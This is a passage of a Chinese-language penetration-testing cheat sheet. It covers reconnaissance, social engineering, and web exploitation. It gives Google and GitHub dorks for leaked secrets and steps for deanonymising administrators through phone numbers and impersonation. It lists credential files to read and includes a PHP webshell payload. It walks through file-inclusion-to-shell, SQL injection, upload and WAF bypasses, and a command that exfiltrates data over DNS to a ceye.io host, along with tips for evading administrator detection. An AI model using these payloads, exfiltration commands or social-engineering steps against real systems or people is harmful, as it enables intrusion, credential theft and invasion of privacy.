- 4、`根据cert里Issuer、Subject特征搜索,一些单位、甚至部门信息会包含在ssl证书内容之中。`
搜索到相似站点后,有几种方式搞到源码:
- 1、`对相似站点进行入侵,getshell后获得源码(动静较大)`
- 2、`对相似站点批量扫备份文件`
- 3、`得知cms的名称去凌风云网盘搜索该cms源码是否有人分享`
- 4、`闲鱼搜有没有对应源码有人在买卖`
- 5、`去github,gitee搜有没有相似的源码,是否是根据别人的源码二次开发的成品`
## google语法
1. 后台地址
- site:xxx.xxx 管理后台/登陆/管理员/系统
- site:xxx.xxx inurl:login/admin/system/guanli/denglu
- site:xxx.xxx intext:"登陆"
1. 敏感文件
- site:xxx.xxx filetype:pdf/doc/xls/txt
- site:xxx.xxx filetype:log/sql/conf
1. 测试环境
- site:xxx.xxx inurl:test/ceshi
- site:xxx.xxx intitle:测试
1. 邮箱/QQ/群
- site:xxx.xxx 邮件/email
- site:xxx.xxx qq/群/企鹅/腾讯
1. 其他
- site:xxx.xxx inurl:api
- site:xxx.xxx inurl:uid=/id=
- site:xxx.xxx intitle:index of
## Github搜索
- @xxx.xxx password/secret/credentials/token/config/pass/login/ftp/ssh/pwd
- @xxx.xxx security_credentials/connetionstring/JDBC/ssh2_auth_password/send_keys
- "domain.com" API_KEY
- "domain.com" login
- "domain.com" password
## 关于社工
1. 查询whois得到电话,邮箱,备案号.备案号查注册人
2. 电话通过支付宝转帐获取真实姓名,利用qq反查微信,qq推测
3. 电话号码添加到通讯录,让第三方app通过通讯录匹配出信息(抖音,支付宝,qq,微信......)
4. 社工库,tg群查泄漏密码
5. 手机号查注册过的网站
```
https://www.reg007.com/
https://www.usersearch.org/
```
6. 得到管理员设置密码习惯,命名习惯.进行爆破,跑备份
7. 利用个人信息生成社工字典
8. 冒充目标好友
9. 近源渗透,wifi,badusb
10. 鱼叉攻击
1. https://mp.weixin.qq.com/s/SzKX0XrAjgo7SL2GYjtSAg 干货 | 邮件钓鱼攻击学习
2. https://mp.weixin.qq.com/s?__biz=MjM5NzE1NjA0MQ%3D%3D&mid=2651202725&idx=1&sn=955fd4c6d80b320a57a3bc7b34fa24f8&scene=45#wechat_redirect红蓝对抗之邮件钓鱼攻击
3. https://mp.weixin.qq.com/s/aatNjey3swZz7T4Yw_LqsQ 红队测试之邮箱打点
4. https://mp.weixin.qq.com/s/gFkFcl2M_SI7UYmosUnTOg 邮件钓鱼平台搭建以及基础使用场景
5. https://mp.weixin.qq.com/s/_3PpI4hKYZRPuYQs2nh67w 钓鱼攻击中文件的几种姿势
11. 水坑攻击
12. 可通过微博进行定位,qq抓ip定位,图片exif定位
13. 各种匿名
14. 密码生成
- 撞库
- 常见手机号
- 常见登录账号(admin、manager、test、deme)
- 数字组合(0-9、00-99、000-999、0000-9999、00000-99999)
- 拼音(zhangsan、zhang.san、zhangs)
- 中文(张三、李四、张san)
- 英文名(Tom、Jeo、Cherry)
- 单位名(zssx123、zssx@123)
- 地名(beijing123、beijing@123)
- 组合(地名+单位名)
- 域名(baidu@123、JD@123)
- 生日组合
## 一点小技巧
1. 无头绪的时候,可以去fofa找相同类型的站点拿下,然后进行代码审计.
2. 主站一般没机会,尽量的去收集目标资产(渗透本质是信息收集),没有拿不下的站点,只要信息收集到位.如果还不行就社工.
3. 遇到难啃的骨头,可以对报403的目录进行扫描,也许会有不错的收获
1. bypass参考https://mp.weixin.qq.com/s/_hcVp9u7OIHnYW1l7lQiCQ
4. 多做漏洞复现,遇到了对应的漏洞就不用去慢慢研究
5. 在进行有可能导致管理员察觉的敏感操作时(如登录远程桌面等),根据目标所在地区,选择对应IP登录。(大多数会提示异地登录提醒,导致权限丢失)
6. 红队电脑不能保存任何个人信息,在某些工作系统语言不要使用中文,防止被反制。
7. 拿到机器及时做权限维持,msf的记得自动迁移进程
8. 尽量和管理员岔开时间段,不要撞到
9. 如果可以,一天一靶机,htb就不错
10. 打某一个行业想要有成果,最好要深入了解这个行业,我举个例子,比如搞传奇/dnf这种私服的,他们讲管理员都叫gm,不像搞IT的叫admin,那你爆一些私服游戏的网页后台、管理账号就需要搞一些行业黑话生成一下,比如/gm/或者/chongzhi/gm.php,用IT行业的字典,水土不服🤣,还有菠菜行业,注册用户需要6位邀请码,很多都是888888、666666这种吉利数字,逆向一下思路,猜一猜目标受众喜欢什么。|r0fus0d
11. 域名资产收集whois反查+兄弟域名+其他后缀域名+备案反查+rapid7公共数据集+js爬取+Github等第三方爬取+subfinder+OneForAll+ksubdomain过滤
## 一些信息收集的命令
#### 互联网c段存活检测
```bash
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oG tmp -iL ip.txt | awk '{print $5}' | grep -v "latency)." >ok_ip.txt
```
#### apk敏感信息收集
提取相关域名链接/IP
```
grep -E "([0-9]{1,3}[\.]){3}[0-9]{1,3}" -r xxx --color=auto
grep -E "https?://[a-zA-Z0-9\.\/_&=@$%?~#-]*" -r xxx --color=auto
```
提取一些敏感信息
```
apktool d app_name.apk
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager|insert into" APKfolder/
```
提取url
```
grep -ohr -E "https?://[a-zA-Z0-9\.\/_&=@$%?~#-]*" /app/ |sort|uniq >> test.txt
```
## mac下反编译apk
手动敲命令太繁琐了,写个 shell 脚本一键化。
在.bash_profile 文件(环境变量)加入这个命令 alias
apkdec="/Users/chen/HackBox/Tools/Android\ Decompile/DeApkScript.sh",
这样当终端打开的时候就可以使用 apkdec 命令了,而脚本 DeApkScript.sh 的内
容如下:
apktool d $1 && mv $1 $1.zip && unzip $1.zip "*.dex" -d $1_dex/ && cd
$1_dex/ && d2j-dex2jar *.dex
功能实现如下:
• apktool 获取资源文件
• 将 apk 文件重命名为 zip 文件
• 解压 zip 文件中的.dex 文件
• 切换解压目录
• 将 dex 文件转换成 jar 文件
这样,最后只需要使用 JD-GUI 反编译 JAR 即可看见源码了。
## spring相关程序必扫字典
```
/v2/api-docs
/swagger-ui.html
/swagger
/api-docs
/api.html
/swagger-ui
/swagger/codes
/api/index.html
/api/v2/api-docs
/v2/swagger.json
/swagger-ui/html
/distv2/index.html
/swagger/index.html
/sw/swagger-ui.html
/api/swagger-ui.html
/static/swagger.json
/user/swagger-ui.html
/swagger-ui/index.html
/swagger-dubbo/api-docs
/template/swagger-ui.html
/swagger/static/index.html
/dubbo-provider/distv2/index.html
/spring-security-rest/api/swagger-ui.html
/spring-security-oauth-resource/swagger-ui.html
/mappings
/metrics
/beans
/configprops
/actuator/metrics
/actuator/mappings
/actuator/beans
/actuator/configprops
/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/intergrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
```
# 漏洞攻击
## 文件读取漏洞
1、一般我拿到一个任意文件读取得先判断权限大不大,如果权限够大的话可以直接先把/etc/sadow读下来,权限不够就读/etc/passwd,先把用户确定下来,方便后续操作
2、读取各个用户的.bash_history能翻有用的信息,如编辑一些敏感文件
3、读取程序配置文件(如数据库连接文件,可以利用数据库写shell)
4、读取中间件配置文件(weblogic/tomcat/apache的密码文件、配置文件,确定绝对路径,方便后面读源码)
5、读取一些软件的运维配置文件(redis/rsync/ftp/ssh等等程序的数据、配置、文档记录)
6、读取程序源代码,方便后面做代码审计,找突破口
7、读取web应用日志文件,中间件的日志文件,其他程序的日志,系统日志等(可以网站后台地址、api接口、备份、等等敏感信息)
8、还有就是可以用字典先跑一波(字典之前有分享过),信息收集还是要全面点。
windows常见的敏感文件路径:
```
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件
```
Linux常见的敏感文件路径:
```
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数
```
## 文件包含漏洞
**一、利用思路总结:**
**1、包含一些敏感的配置文件,获取目标敏感信息**
**2、配合图片马getshell**
**3、包含临时文件getshell**
**4、包含session文件getshell**
**5、包含日志文件getshell(Apach、SSH等等)**
**6、利用php伪协议进行攻击**
**二、具体利用方法:**
**①包含一些敏感的配置文件**
windows常见的敏感文件路径:
```
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
C:\Windows\php.ini //php配置信息
C:\Windows\my.ini //Mysql配置信息
C:\Windows\win.ini //Windows系统的一个基本系统配置文件
```
Linux常见的敏感文件路径:
```
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts //记录每个访问计算机用户的公钥
/etc/passwd
/etc/shadow
/etc/my.cnf //mysql配置文件
/etc/httpd/conf/httpd.conf //apache配置文件
/root/.bash_history //用户历史命令记录文件
/root/.mysql_history //mysql历史命令记录文件
/proc/mounts //记录系统挂载设备
/porc/config.gz //内核配置文件
/var/lib/mlocate/mlocate.db //全文件路径
/porc/self/cmdline //当前进程的cmdline参数
```
**绝对路径:**
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibIc2k614Bbn1libAOQhtDRX1R5Zc7npXmyBqjk9jic2TKmju4vAm2rDnA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
**../跨目录读取:**
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibsGB5eqaug8URYTHUngic9iaP7SdqhhT5uwXuq6yYKkdg4oDXXt3OV29A/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
**②配合图片马getshell**
需要有一个文件上传的点,并且能够上传图片马,图片马的内容如下:
```
<?php fputs(fopen("panda.php","w"),'<? @eval($_POST[PANDA]);?>');?>
```
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibuHDML0ia1F3icQbDxYftBnOmBIlWbdia1wLAYmp0EPB3rJ0QpxbBjpSAg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
会在当前目录下生成panda.php,密码为PANDA,连接即可
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibSrDjjOeamDLqUbUq3ILhroYhea8ME4qMLdnb5wMHECNVRdbqqLMsibw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
**③包含临时文件+phpinfo getshell**
在PHP文件包含漏洞中,当我们找不到用于触发RCE的有效文件时,如果存在PHPINFO(它可以告诉我们临时文件的随机生成的文件名及其位置),我们可能可以包含一个临时文件来利用它升级为RCE。
**利用方法简述:**
在给PHP发送POST数据包时,如果数据包里包含文件区块,无论你访问的代码中有没有处理文件上传的逻辑,PHP都会将这个文件保存成一个临时文件(通常是/tmp/php[6个随机字符]),文件名可以在$_FILES变量中找到。这个临时文件,在请求结束后就会被删除。
同时,因为phpinfo页面会将当前请求上下文中所有变量都打印出来,所以我们如果向phpinfo页面发送包含文件区块的数据包,则即可在返回包里找到$_FILES变量的内容,自然也包含临时文件名。
在文件包含漏洞找不到可利用的文件时,即可利用这个方法,找到临时文件名,然后包含之。
但文件包含漏洞和phpinfo页面通常是两个页面,理论上我们需要先发送数据包给phpinfo页面,然后从返回页面中匹配出临时文件名,再将这个文件名发送给文件包含漏洞页面,进行getshell。在第一个请求结束时,临时文件就被删除了,第二个请求自然也就无法进行包含。
**这个时候就需要用到条件竞争,具体流程如下:**
1、发送包含了webshell的上传数据包给phpinfo页面,这个数据包的header、get等位置需要塞满垃圾数据
2、因为phpinfo页面会将所有数据都打印出来,1中的垃圾数据会将整个phpinfo页面撑得非常大
3、php默认的输出缓冲区大小为4096,可以理解为php每次返回4096个字节给socket连接
4、所以,我们直接操作原生socket,每次读取4096个字节。只要读取到的字符里包含临时文件名,就立即发送第二个数据包
5、此时,第一个数据包的socket连接实际上还没结束,因为php还在继续每次输出4096个字节,所以临时文件此时还没有删除
6、利用这个时间差,第二个数据包,也就是文件包含漏洞的利用,即可成功包含临时文件,最终getshell
**操作过程:**
**访问存在文件包含漏洞的页面**
```
http://192.168.136.128:8080/lfi.php?file=/etc/passwd
```
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibq7iathIdDFVib8elfl2ojziaJqQs9WJ5vA77ZFYwTeRG8icHoibWJjTEK4A/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
访问phpinfo页面,需要确实存在
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibCytdyZHhE2TEKyN2yOGXFoBMbsfiajj9tyUFH1LWyXXdOuAQqqZDqag/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
然后利用exp进行利用:
-
```
python2 exp.py 目标ip 8080 100
```
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibWsQwkcBmrnWQFvepzByhAaT1HLzpu7fe9EFYqRywibrwFajA7oBFqiag/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
在189次请求时,就写入成功了
脚本exp.py实现了上述漏洞利用过程,成功包含临时文件后,会利用file_put_contents函数写入<?=eval($_REQUEST[1])?>一句话后门到/tmp/g文件中,这个文件会永久留在目标机器上
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibPztrWuAFn0QTx0XIEjFNEZf7ibTd82EiaFxicHGhPQ7uWlXfiaYrKdZfbg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
然后直接利用蚁剑进行连接即可,密码为1:
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibI5PuvsGpfI0gWTzRHEwoicoU3McPG9cKfjGWic7Yv11Marjjkc6QyUWw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
**④包含session文件getshell**
session简介:cookie存在客户端,session存在服务端,cookie一般用来保存用户得账户密码,session一般用来跟踪会话。
**利用场景:**
一般对于登陆点存在注册用户的,那么就可以起一个为payload的名字,这样会将payload保存在session文件中
利用条件:
**①session文件路径已知**
session文件路径位置可以通过phpinfo页面来获取:session.save_path参数
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibbDFhfduBoIT0x0RwbfJ8hp2LTu22NLJLXytRexYHN1PW53P0GctI3Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
也可以猜测常见的一些session存储位置:
-
-
```
/var/lib/php/sess_[PHPSESSID]/tmp/sess_[PHPSESSID]
```
**②且其中部分内容可控制**
**利用方式:**
访问漏洞页面,在参数中构造payload
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibhoaENlk0KrwhwvaG7cTLt1dJVdn1VNeaxicxXFNfKBW9zGO1yKtmdpQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
然后我们的首要任务就是获取session文件名,可通过谷歌浏览器,或者burp抓包查看
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibWMmvPROVlpTfvta9CRIagezTqpGfsp1lquleeQDWYTAbBpTn4Q8Ctw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
文件名:sess_hvjhivr3iptal3909f90rksu9p,利用文件包含漏洞跨目录包含session文件getshell
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibkoKlMTR07PtF77W9kjiaQSqJDbknO7A22JdFC2ibZHxLhUWvEYKJh7IA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
连接webshell
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibMNiavmdeC22KwC6ZR4kdRndn3dIngpbr6xj45nh541OsLxMiaXy56mSA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
**⑤包含日志文件getshell**
**1.包含Apache日志文件**
在用户发起请求时,服务器会将请求写入access.log(会记录访问IP、访问链接、Referer和User-Agent等),当请求错误时将错误写入error.log
**利用条件:**日志文件的存储路径,并且日志文件可读。
**①apache的日志文件可以通过phpinfo页面来查询,apache2handler 中的server root就是apache的安装路径,那么日志文件应该就是在这个路径下的logs目录中**
**②或者通过猜测常见日志文件的路径/usr/local/apache/logs/error_log或者access_log**
**③也可用通过先包含配置文件来确定日志文件路径**
-
-
```
index.php?page=/etc/init.d/httpdindex.php?page=/etc/httpd/conf/httpd.conf
```
**利用方式:**
因为会自动url编码,会导致无法利用,所以抓包再请求
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibILg71QSriaVicBkWxaev9IpmrlzRyKP0Tz1yToSPDU7WGewq3ib3cYvIQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
可以看到error.log文件中已经成功写入了payload
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibMkPvIM4j8CsHdWHV7kYSFSXNVbymciaPHKVqibZiaqPicUFhRThfIqybEg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
然后包含log文件路径即可
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbib3wPM0ibYiaEx35XrvDlXjbG6rnJKOFeeutXBoapvSFNydYkwnaSAAAvA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
连接webshell
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibMNiavmdeC22KwC6ZR4kdRndn3dIngpbr6xj45nh541OsLxMiaXy56mSA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
**2.包含SSH日志文件**
-
```
ssh '<?php phpinfo();?>'@192.168.136.143
```
这样把用户名写成phpinfo,ssh的登陆日志就会把此次的登陆行为记录到日志中,利用包含漏洞getshell
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibLEl6dAVGe8c6AfyrnevYGZVKkQO8h0H6syPzNG7KMauQrgmRyyTtzw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
可以看到我们登陆的行为都被记录到了日志当中
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibIOibBzIOLll8ooQ5sWeF2fSQ7rtnP6APU09wPibUht1o3ia6E9Peyt6NQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
可以看到刚才登陆的时候,成功phpinfo写入到日志文件中并且成功解析
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibxS7Brrqa6zc0M4T5jmzq1vEG2Fsiaq2huYwD3QVhD9zWku3rHCSCYcQ/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
通过phpinfo查看到了网站根目录
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibQRHNccvl4ODY5iaDEUic4lpyicY7RiaqWycEtEMPYv1NJuoSSBwlOh8Ocw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
本来想着利用文件包含漏洞配合fputs和fopen函数在网站根目录写入一句话木马getshell,但是由于单引号太多就报错了,只能另谋出路
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibIsYlBtsR4lng0YiaeIXYV1z139YrLPsbRs7STvVf25KhuhDWFxAV54Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
然后就想到了把执行命令的一句话木马写入日志,利用文件包含执行反弹shell
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibuKZsD9bvlceKys2xVDMmEibfzvuicgMEBc0R8bbX9pDu00ia6YsHaUcgA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
然后构造请求执行命令,因为刚才我写进去的是通过GET方式用panda参数传参,多个参数之间用&符号连接,还是要注意,命令要url编码再执行
![img](https://mmbiz.qpic.cn/mmbiz_png/ehibzaP4CvW5u62003kUNCvqaZBl7yLbibPsafM6CeRIB6Aja4KKcXibgwQZtpooic4hQp9UBszS3CiaGfGmPgTV3hA/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1)
## sql注入漏洞
手注
https://github.com/aleenzz/MYSQL_SQL_BYPASS_WIKI/
查询用 http://sqlwiki.radare.cn/
**mysql数字型手注**
字符型和数字的注入基本一样(下面直接演示数字型),只是字符的需要闭合前面的一条sql
常见的闭合就是
```
'
"
')
'')
```
有时还需要注释后面的一些sql
可以使用
```
--+
# 在url里面需要编码为 %23
```
```
判断字段
?id=1 and 1=1 order by 1
回显点判断
?id=1 and 1=2 union select 1,2
当前库
?id=1 and 1=2 union select 1,database()
当前用户
?id=1 and 1=2 union select 1,user()
当前版本
?id=1 and 1=2 union select 1,version()
爆表
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
当前表字段名
用limit进行查询
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
获取数据
?id=1 and 1=2 union select 1,password from admin limit 0,1
```
mysql报错注入
在不能联合注入的时候就需要用到它
(有十种报错函数,https://www.cnblogs.com/wocalieshenmegui/p/5917967.html)
```
爆库:
http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (schema_name),0x7e) FROM information_schema.schemata limit 2,1),1) -- +
爆表:
http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +
爆字段:
http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, (column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +
爆数据:
http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,(select concat(0x7e, password,0x7e) from users limit 1,1),1) -- +
```
mysql盲注
1. 时间盲注
2. 布尔盲注
可以用二分,dnslog,等等可以加快注入
工具
https://github.com/ADOOO/DnslogSqlinj
时间盲注也叫延时注入 一般用到函数 `sleep()` `BENCHMARK()`
一般时间盲注我们还需要使用条件判断函数
`if(expre1,expre2,expre3)` 当expre1为true时,返回expre2,false时,返回expre3 盲注的同时也配合着mysql提供的分割函,与正则函数 like函数,比较函数等等
```
select * from users where id =1 and if((substr((select user()),1,1)='r'),sleep(5),1);
```
们一般喜欢把分割的函数编码一下,当然不编码也行,编码的好处就是可以不用引号 常用到的就有 `ascii()` `hex()` 等等 `benchmark()`其作用是来测试一些函数的执行速度。benchmark()中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式。
```
select * from users where id =1 and if((substr((select user()),1,1)='r'),BENCHMARK(20000000,md5('a')),1);
```
盲注思路的思路很多 比如正则匹配,比较函数,运算符,推荐大家可以看看 https://www.anquanke.com/post/id/170626
简单来说就是通过函数看返回true还是false
1.直接通过字符串截取对比,类似函数很多后面做个总结吧
```
http://127.0.0.1/sqli/Less-1/?id=1' and substr((select user()),1,1)='r' -- +
```
2.用 `IFNULL()` 函数
```
http://127.0.0.1/sqli/Less-1/?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +
```
3.使用 比较函数`strcmp()`
```
1.
http://127.0.0.1/sqli/Less-1/?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +
http://127.0.0.1/sqli/Less-1/?id=1' and strcmp((substr((select user()),1,1)='r'),0) -- +
2.
mysql> select * from users where id =1 and 0=strcmp((substr((select user()),1,1)),'o');
Empty set (0.00 sec)
mysql> select * from users where id =1 and 0=strcmp((substr((select user()),2,1)),'o');
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
```
**mssql手注**
参考https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI
查询基本信息
```
and @@version>~1
and (user|1)>-1
and (db_name()|1)>.1
```
判断当前表名和列名 也可以使用 `having 1=1` 和 `group by`
```
http://192.168.130.137/1.aspx?id=1 having 1=1
```
**爆出当前表和字段**
[![mysql](img/1.4.6.png)](https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI/blob/master/img/1.4.6.png)
**爆出所有的字段**
```
http://192.168.130.137/1.aspx?id=1 group by info.id,info.name having 1=1
```
[![mysql](img/1.4.7.png)](https://github.com/aleenzz/MSSQL_SQL_BYPASS_WIKI/blob/master/img/1.4.7.png)
## 文件上传漏洞
![image-20201125140003211](img/image-20201125140003211.png)
练习环境:https://github.com/c0ny1/upload-labs
参考文章:
https://www.jianshu.com/p/74ca4e884645 (上传总结)
https://www.jianshu.com/p/1ccbab572974 (解析总结)
**特殊后缀绕过黑名单**
apache
> php、php3、php4、php5、phpt、phtml
iis
> asa、cer、cdx
**上传.htaccess文件**
我们需要上传一个.htaccess文件,内容为:
```xml
#所有文件都会解析成php
SetHandler application/x-httpd-php
# 解析指定jpg
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
# 解析xx后缀
AddType application/x-httpd-php xxx
```
**NTFS流冒号截断**
如上传"test.asp:1.jpg"文件,会生成一个名为"test.asp"的空文件,原理是利用Windows的NTFS可替代数据流的特性。另外,
":"截断操作是优先级高于会报错的字符(0x00除外)的,会先截断,只要报错字符在":"后面,系统是不会报错的。
如果":"是文件名的最后一个字符,则不会截断,会报错
一个文件名中如果包含1个以上的":"号,也是会报错
**::$DATA绕过**
windows特性,可在后缀名中加” ::$DATA”绕过
**nginx空字节代码执行漏洞**
在fast-cgi关闭的情况下,nginx版本:0.5.*, 0.6.*, 0.7- 0.7.65, 0.8 -0.8.37,nginx在图片后附加php代码然后通过访问
```css
xx.jpg%00.php
```
**IIS 7.0&7.5畸形解析漏洞和nginx畸形解析漏洞**
默认fast-cgi开启状况下,在一个文件路径后面加上/xx.php会将原来的文件解析为php文件
上传test.jpg,然后访问test.jpg/.php或test.jpg/abc.php当前目录下就会解析为php
**iis6畸形目录解析漏洞**
原因是web应用程序和IIS对同一文件的文件名称(类型)理解不一致造成的
1. 畸形目录解析
/xxxx.asp/xxx.jpg
即.asp结尾的目录下面,而被IIS当成可执行文件来解析
2. 分号文件解析
test.asp;.jpg
**Apache文件名解析**
Apache对文件的解析名不是仅仅认识最后一个后缀名,而是从右向左,依次识别,直到遇到自己能解析的文件名为止
.php.sfds.sfsdf.wewfgw.gwegw
只认识php就解析为php
**Apache换行解析漏洞 (CVE-2017-15715)**
其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析
上传webshell,然后在1.php后面插入一个\x0A换行
**nginx文件名逻辑漏洞(CVE-2013-4547)**
受影响的nginx版本: 0.8.41至1.4.3和1.5.7之前的1.5.x
正常上传一个附加代码的图片"test.jpg",访问时后面+"空格"+"\0"+".php" 即让图片作为php文件解析
(不能编码,burp改包,把第二个空格改为00)
```bash
"/test.jpg .php"
/test.jpg[0x20][0x00].php
```
**bypass waf**
安全狗的绕过,常有下列三种方法
a). ===绕过
Content-Disposition : from-data; name="upload" ; filename==="microfan.php"
b). 去除""绕过
Content-Disposition : from-data; name="upload" ; filename=microfan.php
c). 少"绕过
Content-Disposition : from-data; name="upload" ; filename="microfan.php
## 命令执行
### 结果外带
**Windows**
在windows当中,%cd% 代表的是当前目录,我们通过echo将当前目录写入文本temp,然后荣国certutil对文件内容进行base64编码,再过滤certutil携带的字符,将它赋给一个变量,最后通过nslookup外带出来,从而实现获取当前目录的目的。
```
echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&set /p ADDR=<temp2&&nslookup %ADDR%.is1lv6.ceye.io
```
